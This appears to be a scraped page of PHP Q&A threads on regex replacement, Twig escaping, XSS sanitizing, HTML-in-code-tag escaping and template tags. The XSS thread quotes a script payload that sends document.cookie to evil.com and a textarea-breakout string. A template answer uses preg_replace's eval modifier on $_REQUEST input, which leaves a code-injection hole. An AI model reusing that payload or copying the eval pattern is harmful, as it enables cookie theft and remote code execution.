PHP Regular Expression - Single Quote not working - TWIG pre-escaping - php

I have a problem with single quotes in a regular expression.
What I want to do is replace smileys in a string with an HTML image tag.
All smileys work except the sad smiley :'-( because it contains a single quote.
Magic Quotes is turned off (tested with if (!get_magic_quotes_gpc()) dd('mq off');).
So, let me show you some code.
protected $emoticons = array(
// ...
'cry' => array(
'image' => '<img class="smiley" src="/image/emoticon/cry.gif" />',
'emoticons' => array(":'(", ";'(", ":'-(", ";'-(")
),
);
My method to replace all the emoticons is the following:
public function replaceEmoticons($input) {
$output = $input;
foreach ($this->emoticons as $emo_group_name => $emo_group) {
$regex_emo_part = array();
foreach ($emo_group['emoticons'] as $emoticon) {
$regex_emo_part[] = preg_quote($emoticon, '#');
}
$regex_emo_part = implode('|', $regex_emo_part);
$regex = '#(?!<\w)(' . $regex_emo_part .')(?!\w)#';
$output = preg_replace($regex, $emo_group['image'], $output);
}
return $output;
}
But as I said: ' kills it. No replacement happens there. :-) :-/ and so on work. Why?
FYI Content of $regex: #(?!<\w)(\:\'\(|;\'\(|\:\'\-\(|;\'\-\()(?!\w)#
What is wrong here, can you help me?
UPDATE:
Thanks @cheery and cychoi. The replacing method is okay, you were right.
I found the problem. My string gets escaped before it is passed to the replaceEmoticons method. I use the TWIG templating engine, and I apply the |nl2br filter before my self-made replace_emoticons filter.
Let me show you. This is the output in the final template. It is a template that shows a comment on a blog entry:
{{ comment.content|nl2br|replace_emoticons|raw }}
Problem: nl2br automatically pre-escapes the input string, so ' gets replaced by its escaped form &#039;
I need nl2br to show line breaks as <br /> - and I need the escaping too, to disallow HTML tags in the user's input.
I need replace_emoticons to replace my emoticons (self-made TWIG extension).
And I need raw at the end of the filter chain too, otherwise all HTML smiley img tags get escaped and I will see raw HTML in the comment's text.
What can I do here? The only problem seems to be that nl2br escapes ' too. That is not a bad idea in general, but in my case it breaks all sad smileys that contain a '.
I am still searching for a solution and hope you can help me.
Best,
titan

I added an optional parameter to the emoticon method:
public function replaceEmoticons($input, $use_emo_encoding_for_regex = true) {
and I changed the foreach part a little bit:
foreach ($emo_group['emoticons'] as $emoticon) {
if ($use_emo_encoding_for_regex === true) {
$emoticon = htmlspecialchars($emoticon, ENT_QUOTES);
}
$regex_emo_part[] = preg_quote($emoticon, '#');
}
It works! All emoticons are replaced!
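For anyone who wants to try this outside of a class, here is a minimal stand-alone sketch of the same idea. The function signature, the $inputIsEscaped parameter name and the trimmed emoticon table are my own assumptions for illustration, and I wrote the first assertion as the negative lookbehind (?<!\w), which is presumably what the original pattern intended. The nl2br(htmlspecialchars(...)) call only simulates what the template does before the emoticon filter runs.

```php
<?php
// Hypothetical stand-alone version of the method; only the 'cry' group is included.
function replaceEmoticons(string $input, array $emoticons, bool $inputIsEscaped = true): string
{
    $output = $input;
    foreach ($emoticons as $group) {
        $parts = [];
        foreach ($group['emoticons'] as $emoticon) {
            if ($inputIsEscaped) {
                // Match what the escaper produced, e.g. ' becomes &#039;
                $emoticon = htmlspecialchars($emoticon, ENT_QUOTES);
            }
            $parts[] = preg_quote($emoticon, '#');
        }
        // (?<!\w) is a negative lookbehind, (?!\w) is a negative lookahead
        $regex = '#(?<!\w)(' . implode('|', $parts) . ')(?!\w)#';
        $output = preg_replace($regex, $group['image'], $output);
    }
    return $output;
}

$emoticons = [
    'cry' => [
        'image' => '<img class="smiley" src="/image/emoticon/cry.gif" />',
        'emoticons' => [":'(", ";'(", ":'-(", ";'-("],
    ],
];

// Simulate the escaping that happens before the emoticon filter is applied.
$escaped = nl2br(htmlspecialchars("So sad :'-(\nbye", ENT_QUOTES));
echo replaceEmoticons($escaped, $emoticons), "\n";
```

With $inputIsEscaped set to false the same function should work on text that has not been escaped yet.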

Related

Sanitizing Output To Textarea From XSS

What are the best methods of sanitizing values from a database (in php) if they are to be used in inputs like textareas?
For example, when inserting data, I can strip tags and quotes and replace them with html char codes and then use mysql_real_escape_string right before insertion.
When retrieving that data back, I need it to show up in a textarea. How can I do this and still avoid XSS? (Ex. you could easily type in
</textarea><script type='text/javascript'> Malicious Code</script><textarea>
) and cause problems.
Thanks!
I think I would prefer a combination of filter_var and urldecode if you want a pure, simple PHP solution
Reason
Imagine an input like this
$maliciousCode = "<script>document.write(\"<img src='http://evil.com/?cookies='\"+document.cookie+\"' style='display:none;' />\");</script> I love PHP";
If i use strip_tags
var_dump(strip_tags($maliciousCode));
Output
string 'document.write("' (length=16)
if i use htmlspecialchars
var_dump(htmlspecialchars($maliciousCode));
Output
string '&lt;script&gt;document.write(&quot;&lt;img src='http://evil.com/?cookies='&quot;+document.cookie+&quot;' style='display:none;' /&gt;&quot;);&lt;/script&gt; I love PHP' (length=166)
My Choice
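function cleanData($str) {
    // Decode URL-encoded input first so encoded tags cannot slip through
    $str = urldecode($str);
    // Note: FILTER_SANITIZE_STRING is deprecated as of PHP 8.1
    $str = filter_var($str, FILTER_SANITIZE_STRING);
    $str = filter_var($str, FILTER_SANITIZE_SPECIAL_CHARS);
    return $str;
}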
$input = cleanData ( $maliciousCode );
var_dump($input);
Output
string 'document.write(&#38;#34;&#38;#34;); I love PHP' (length=46)
If the form uses GET instead of POST, some input can still escape if it is URL-encoded, which is why urldecode runs first. You keep a minimal amount of information and make sure the final text is harmless.
There are also enough classes online to help you filter, see
http://www.phpclasses.org/package/2189-PHP-Filter-out-unwanted-PHP-Javascript-HTML-tags-.html
http://htmlpurifier.org/
HTMLpurifier is a great tool for cleaning out unwanted HTML, particularly unwanted JavaScript. Also using htmlspecialchars() is recommended for outputting user-provided content.
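To make the htmlspecialchars() recommendation concrete for the textarea case, here is a minimal sketch. The helper name renderTextarea and the field name are made up for illustration; the idea is simply to store the data as entered and escape it at output time.

```php
<?php
// Hypothetical helper: renders a textarea whose content comes from untrusted data.
function renderTextarea(string $name, string $value): string
{
    $safeName  = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
    $safeValue = htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
    return '<textarea name="' . $safeName . '">' . $safeValue . '</textarea>';
}

// The attack string from the question.
$stored = "</textarea><script type='text/javascript'> Malicious Code</script><textarea>";
echo renderTextarea('comment', $stored), "\n";
```

The browser shows the original characters inside the textarea, but the markup can no longer close the textarea early or start a script element.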
After getting a dirty spammer on my contact form I expanded my function that sanitizes textbox user input. It now also covers multi-line textarea input.
I needed to format for normal display and also html email from my contact page.
It also gives option to format for a plain text email which I also use.
function clean_text($text, $html = true)
{ if($text == ""){return "";}
$text = nl2br($text,false); // false gives <br>, true gives <br />
$textary = explode("<br>",$text);
foreach($textary as $key => $val)
{ $val = trim($val);
$val = stripslashes($val);
$val = htmlspecialchars($val);
$textary[$key] = $val;
}
if ($html)
{ return implode("<br />",$textary);} //return implode("<br>",$textary);
else
{ return implode("\r\n",$textary);}
}
By the way... Thanks SO members for being part of my learning PHP.
Example at http://www.microcal.ca/scripts/cleantext.php

PHP - Display Tags Within Tag as Text

Sorry for not being able to make the title clearer.
Basically I can type text onto my page, where all HTML-TAGS are stripped, except from a couple which I've allowed.
What I want though is to be able to type all the tags I want, to be displayed as plain text, but only if they're within 'code' tags. I'm aware I'll probably use htmlentities, but how can I do it to only affect tags within the 'code' tag?
Can it be done?
Thanks in advance guys.
For example I have $_POST['content'] which is what's shown on the web page. And is the variable with all the output I'm having problems with.
Say I post a paragraph of text, it will be echoed out with all tags stripped except for a few, including the 'code' tag.
Within the code tag I put code, such as HTML information, but this should be displayed as text. How can I escape the HTML tags to be displayed as plain text within the 'code' tag only?
Below is an example of what I may type:
Hi there, this is some text and this is a picture <img ... />.
Below I will show you the code how to do this image:
<code>
<img src="" />
</code>
Everything within the <code> tags should be displayed as plain text so that it won't get removed by PHP's strip_tags, but only HTML tags within the <code> tags.
If it's STRICTLY code tags, then it can be done quite easily.
First, explode your string by any occurrences of '<code>' or '</code>'.
For example, the string:
Hello <code> World </code>
Should become a 4-item array: {Hello, <code>, World, </code>}
Now loop through the array starting at 0 and incrementing by 4. Each element you hit, run your current script on (to remove all but the allowed tags).
Now loop through the array starting at 2 and incrementing by 4. Each element you hit, just run htmlspecialchars on it.
Implode your array, and now you have a string where anything inside the tags is completely sanitized and anything outside the tags is partially sanitized.
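The steps above can be sketched roughly like this. It is not the answerer's code: the function name sanitizeWithCode and the allowed-tag list are assumptions, and instead of stepping through fixed indexes it keeps a flag for "currently inside code", which also copes with input that starts with a code block.

```php
<?php
// Hypothetical helper implementing the split-and-alternate idea.
function sanitizeWithCode(string $input, string $allowedTags = '<b><i><img>'): string
{
    // The capture group keeps the <code> and </code> delimiters in the result.
    $parts = preg_split('#(</?code>)#i', $input, -1, PREG_SPLIT_DELIM_CAPTURE);
    $insideCode = false;
    foreach ($parts as $i => $part) {
        if (strcasecmp($part, '<code>') === 0) {
            $insideCode = true;
        } elseif (strcasecmp($part, '</code>') === 0) {
            $insideCode = false;
        } elseif ($insideCode) {
            // Fully escape everything between the code tags.
            $parts[$i] = htmlspecialchars($part, ENT_QUOTES, 'UTF-8');
        } else {
            // Outside of code, keep only the allowed tags.
            $parts[$i] = strip_tags($part, $allowedTags);
        }
    }
    return implode('', $parts);
}

echo sanitizeWithCode('Hi <u>there</u> <code><img src="" /></code>'), "\n";
// Hi there <code>&lt;img src=&quot;&quot; /&gt;</code>
```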
This is the solution I found which works perfectly for me.
Thanks everyone for their help!
function code_entities($matches) {
return str_replace($matches[1],htmlentities($matches[1]),$matches[0]);
}
$content = preg_replace_callback('/<code.*?>(.*?)<\/code>/imsu', 'code_entities', $_POST['content']);
Here is some sample code that should do the trick:
$parsethis = '';
$parsethis .= "Hi there, this is some text and this is a picture <img src='http://www.google.no/images/srpr/logo3w.png' />\n";
$parsethis .= "Below I will show you the code how to do this image:\n";
$parsethis .= "\n";
$parsethis .= "<code>\n";
$parsethis .= " <img src='http://www.google.no/images/srpr/logo3w.png' />\n";
$parsethis .= "</code>\n";
$pattern = '#(<code[^>]*>(.*?)</code>)#si';
$finalstring = preg_replace_callback($pattern, "handle_code_tag", $parsethis);
echo $finalstring;
function handle_code_tag($matches) {
$ret = '<pre>';
$ret .= str_replace(array('<', '>'), array('&lt;', '&gt;'), $matches[2]);
$ret .= '</pre>';
return $ret;
}
What it does:
First, using preg_replace_callback, I match all code inside <code></code> and send it to my callback function handle_code_tag, which escapes all less-than and greater-than signs inside the content. The matches array will contain the full matched string in [1] and the match for (.*?) in [2]. In the #si modifiers, s means . also matches across line breaks and i means case-insensitive.
The rendered output looks like this in my browser:

Replacing words with tag links in PHP

I have a text ($text) and an array of words ($tags). These words in the text should be replaced with links to other pages without breaking the existing links in the text. In CakePHP there is a method in TextHelper for doing this, but it is buggy and breaks the existing HTML links in the text. The method is supposed to work like this:
$text=Text->highlight($text,$tags,'\1',1);
Below there is existing code in CakePHP TextHelper:
function highlight($text, $phrase, $highlighter = '<span class="highlight">\1</span>', $considerHtml = false) {
if (empty($phrase)) {
return $text;
}
if (is_array($phrase)) {
$replace = array();
$with = array();
foreach ($phrase as $key => $value) {
$key = $value;
$value = $highlighter;
$key = '(' . $key . ')';
if ($considerHtml) {
$key = '(?![^<]+>)' . $key . '(?![^<]+>)';
}
$replace[] = '|' . $key . '|ix';
$with[] = empty($value) ? $highlighter : $value;
}
return preg_replace($replace, $with, $text);
} else {
$phrase = '(' . $phrase . ')';
if ($considerHtml) {
$phrase = '(?![^<]+>)' . $phrase . '(?![^<]+>)';
}
return preg_replace('|'.$phrase.'|i', $highlighter, $text);
}
}
You can see (and run) this algorithm here:
http://www.exorithm.com/algorithm/view/highlight
It can be made a little better and simpler with a few changes, but it still isn't perfect. Though less efficient, I'd recommend one of Ben Doom's solutions.
Replacing text in HTML is fundamentally different than replacing plain text. To determine whether text is part of an HTML tag requires you to find all the tags in order not to consider them. Regex is not really the tool for this.
I would attempt one of the following solutions:
Find the positions of all the words. Working from last to first, determine if each is part of a tag. If not, add the anchor.
Split the string into blocks. Each block is either a tag or plain text. Run your replacement(s) on the plain text blocks, and re-assemble.
I think the first one is probably a bit more efficient, but more prone to programmer error, so I'll leave it up to you.
If you want to know why I'm not approaching this problem directly, look at all the questions on the site about regex and HTML, and how regex is not a parser.
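As a rough illustration of the second suggestion (split into tag blocks and plain-text blocks, replace only in the text), here is a minimal sketch. The function name linkTags and the /tag/ URL prefix are made up, and it also skips text inside existing <a> elements so no nested links are produced. It still uses a regex to find the tags, so it will not cope with every piece of HTML (for example a > inside an attribute value).

```php
<?php
// Hypothetical helper: wraps each tag word in a link, touching only text outside of tags.
function linkTags(string $html, array $tags, string $urlPrefix = '/tag/'): string
{
    if ($tags === []) {
        return $html;
    }
    $words = array_map(fn($t) => preg_quote($t, '/'), $tags);
    $pattern = '/\b(' . implode('|', $words) . ')\b/i';

    // With one capture group, odd-indexed pieces are tags and even-indexed pieces are text.
    $pieces = preg_split('/(<[^>]*>)/', $html, -1, PREG_SPLIT_DELIM_CAPTURE);
    $insideAnchor = false;
    foreach ($pieces as $i => $piece) {
        if ($i % 2 === 1) {
            if (preg_match('/^<a\b/i', $piece)) {
                $insideAnchor = true;
            } elseif (preg_match('#^</a\b#i', $piece)) {
                $insideAnchor = false;
            }
            continue; // never modify the tags themselves
        }
        if (!$insideAnchor) {
            $pieces[$i] = preg_replace_callback($pattern, function ($m) use ($urlPrefix) {
                return '<a href="' . $urlPrefix . rawurlencode(strtolower($m[1])) . '">' . $m[1] . '</a>';
            }, $piece);
        }
    }
    return implode('', $pieces);
}

echo linkTags('<p title="php">I like PHP and <a href="/x">php docs</a>.</p>', ['php']), "\n";
// <p title="php">I like <a href="/tag/php">PHP</a> and <a href="/x">php docs</a>.</p>
```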
This code works just fine. What you may need to do is check the CSS for the <span class="highlight"> and make sure it is set to some color that will allow you to see that it is highlighted.
.highlight { background-color: #FFE900; }
Amorphous - I noticed Gert edited your post. Are the two code fragments exactly as you posted them?
So even though the original code was designed for highlighting, I understand you're trying to repurpose it for generating links - it should, and does work fine for that (tested as posted).
HOWEVER escaping in the first code fragment could be an issue.
$text=Text->highlight($text,$tags,'\1',1);
Works fine... but if you use speech marks (double quotes) rather than single quote marks, the backslash is treated as the start of an escape sequence and disappears, so you need to escape it. If you don't, you get %01 links.
The correct way with speech marks is:
$text=Text->highlight($text,$tags,"\\1",1);
(Notice the use of \\1 instead of \1)
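A quick way to see the difference between the quoting styles, independent of CakePHP (the <b> wrapper is just a placeholder replacement string):

```php
<?php
$single  = '<b>\1</b>';   // backslash and 1 are kept literally
$wrong   = "<b>\1</b>";   // "\1" is an octal escape: a single byte with value 1
$escaped = "<b>\\1</b>";  // "\\" yields one backslash, so this equals $single

var_dump($single === $escaped);   // bool(true)
var_dump(strlen($wrong));         // int(8)
echo preg_replace('/(cake)/i', $escaped, 'I like Cake'), "\n"; // I like <b>Cake</b>
```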

Need to extract special tags and replace them based upon their contents using regular expression

I'm working on a simple templating system. Basically I'm setting it up such that a user would enter text populated with special tags of the form: <== variableName ==>
When the system would display the text it would search for all tags of the form mentioned and replace the variableName with its corresponding value from a database result.
I think this would require a regular expression but I'm really messed up in REGEX here. I'm using php btw.
Thanks for the help guys.
A rather quick and dirty hack here:
<?php
$teststring = "Hello <== tag ==>";
$values = array();
$values['tag'] = "world";
function replaceTag($name)
{
global $values;
return $values[$name];
}
echo preg_replace('/<== ([a-z]*) ==>/e','replaceTag(\'$1\')',$teststring);
Output:
Hello world
Simply place your 'variables' in the variable array and they will be replaced.
The e modifier to the regular expression tells it to eval the replacement, the [a-z] lets you name the "variables" using the characters a-z (you could use [a-z0-9] if you wanted to include numbers). Other than that its pretty much standard PHP.
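Note that the e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so the snippet above will not run on current versions. A sketch of the same replacement with preg_replace_callback might look like this; leaving unknown tags untouched is my own choice here, not something the original answer specifies.

```php
<?php
$values = ['tag' => 'world'];
$teststring = 'Hello <== tag ==> and <== missing ==>';

$result = preg_replace_callback(
    '/<== ([a-z0-9_]+) ==>/i',
    function (array $m) use ($values) {
        // Leave unknown tags untouched instead of raising a warning.
        return array_key_exists($m[1], $values) ? $values[$m[1]] : $m[0];
    },
    $teststring
);

echo $result, "\n"; // Hello world and <== missing ==>
```

Passing $values in through use also avoids the global, and nothing from the input is ever evaluated as code.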
Very useful - Pointed me to what I was looking for...
Replacing tags in a template e.g.
<<page_title>>, <<meta_description>>
with corresponding request variables, e.g.
$_REQUEST['page_title'], $_REQUEST['meta_description'],
using a modified version of the code posted:
$html_output=preg_replace('/<<(\w+)>>/e', '$_REQUEST[\'$1\']', $template);
Easy to change this to replace template tags with values from a DB etc...
If you are doing a simple replace, then you don't need to use a regexp. You can just use str_replace() which is quicker.
(I'm assuming your '<== ' and ' ==>' are delimiting your template var and are replaced with your value?)
$subject = str_replace('<== '.$varName.' ==>', $varValue, $subject);
And to cycle through all your template vars...
$tplVars = array();
$tplVars['ONE'] = 'This is One';
$tplVars['TWO'] = 'This is Two';
// etc.
// $subject is your original document
foreach ($tplVars as $varName => $varValue) {
$subject = str_replace('<== '.$varName.' ==>', $varValue, $subject);
}

preg_replace() str_replace() apostrophe nightmare! - Drupal menu image replace

Can anyone help me decode why this doesn't work?
$cssid = preg_replace("/'/", "", $cssid);
Trying to strip the single quote marks from some html...
Thanks!
H
EDIT
This is the full function - it's designed to rebuild the Drupal menu using images, and it applies CSS classes to each item, allowing you to select the image you want. Stripping out spaces and apostrophes needs to be done or the CSS selector fails.
The title of the menu item causing all this problem is:
What's new
Pretty innocuous you'd think. (Except for that single ')
function primary_links_add_icons() {
$links = menu_primary_links();
$level_tmp = explode('-', key($links));
$level = $level_tmp[0];
$output = "<ul class=\"links-$level\">\n";
if ($links) {
foreach ($links as $link) {
$link = l($link['title'], $link['href'], $link['attributes'], $link['query'], $link['fragment']);
$cssid = str_replace(' ', '_', strip_tags($link));
$cssid = str_replace('\'', '', $cssid);
/*$link = preg_replace('#(<a.*?>).*?(</a>)#', '$1$2', $link);*/
$output .= '<li id="'.$cssid.'">' . $link .'</li>';
};
$output .= '</ul>';
}
return $output;
}
EDIT the saga continues...
I notice that I get the following error in PHPMYADMIN:
The mbstring PHP extension was not
found and you seem to be using a
multibyte charset. Without the
mbstring extension phpMyAdmin is
unable to split strings correctly and
it may result in unexpected results.
I wonder whether this has something to do with it?
In any case the the SQL code is:
('primary-links', 951, 0, 'http://www.google.com', '', 'What''s New',
And this displays in FireBug once it's been rendered as:
<li id="What's_New">
I've created a menu item called "What#s New" and the str_replace() will work on that just fine, so it's ALL about this goddam apostrophe. I think I agree, the expression works, but it has to be an encoding problem. It really is a proper, common, apostrophe and not one of the variants, but for some reason PHP is absolutely unable to recognise it as such.
EDIT oh god oh god - it's Drupal again...
It appears that the function l() which formats all the links is completely impervious to having its output rewritten?! Whatever the case, this code works...
function primary_links_add_icons() {
$links = menu_primary_links();
$level_tmp = explode('-', key($links));
$level = $level_tmp[0];
$output = "<ul class=\"links-$level\">\n";
if ($links) {
foreach ($links as $link) {
$link['title'] = str_replace('\'', '', $link['title']);
$link = l($link['title'], $link['href'], $link['attributes'], $link['query'], $link['fragment']);
$cssid = str_replace(' ', '_', strip_tags($link));
/*$link = preg_replace('#(<a.*?>).*?(</a>)#', '$1$2', $link);*/
$output .= '<li id="'.$cssid.'">' . $link .'</li>';
};
$output .= '</ul>';
}
return $output;
}
2 hours later and I can carry on theming this site...
Thank you so much for all your suggestions, I'm going to point the drupal snippet authors at this post so hopefully other people will benefit from it too.
CSS image replacement is a much more commonly chosen way for menu item replacing:
First install the Menu Attributes module to be able to assign CSS ids to every menu item. (These attributes can be set from the menu item edit page in the admin panel.)
Then use css image replacement. Here is a good tutorial for this.
And this is the method i use for my sites:
#primary-tv
{
display: block;
width: 90px;
height: 0px;
padding-top: 41px;
background: url(images/nghtv.png);
}
This is an example for replacement with an image of 90 x 41px
And for the apostrophe replacement:
$cssid = preg_replace("'","",htmlspecialchars($cssid, ENT_QUOTES));
escape the single quote.
Your code looks fine. But why don’t you use str_replace as you’re replacing a fixed string?
$cssid = str_replace("'", "", $cssid);
If str_replace("'","") doesn't work, are you sure the characters you want to remove are indeed normal apostrophes (') instead of weird alternatives (’), or some weird accent marks (´`˙ ̛̉῾᾿) or single quotes (‘’) or whatnot?
Or maybe the value of $cssid gets replaced back to original by some other bug?
Maybe you're looking at the wrong output for results?
Or by a far chance, are you accidentally running a different copy of the code than the one you are editing - btw, that's really annoying when it happens! :)
Given that it is HTML have you considered that it may be represented as &#39 rather than '?
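If that is what happens, i.e. the apostrophe has already been turned into an entity by the time you look at the string, then one option is to decode entities before stripping. A minimal sketch, with a made-up helper name and a hard-coded link instead of Drupal's l():

```php
<?php
// Hypothetical helper: builds a CSS id from already-rendered link markup.
function cssIdFromLink(string $linkHtml): string
{
    $text = strip_tags($linkHtml);
    // Turn &#039;, &#39; and similar entities back into real characters first.
    $text = html_entity_decode($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $text = str_replace("'", '', $text);
    return str_replace(' ', '_', $text);
}

echo cssIdFromLink('<a href="/new">What&#039;s new</a>'), "\n"; // Whats_new
```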
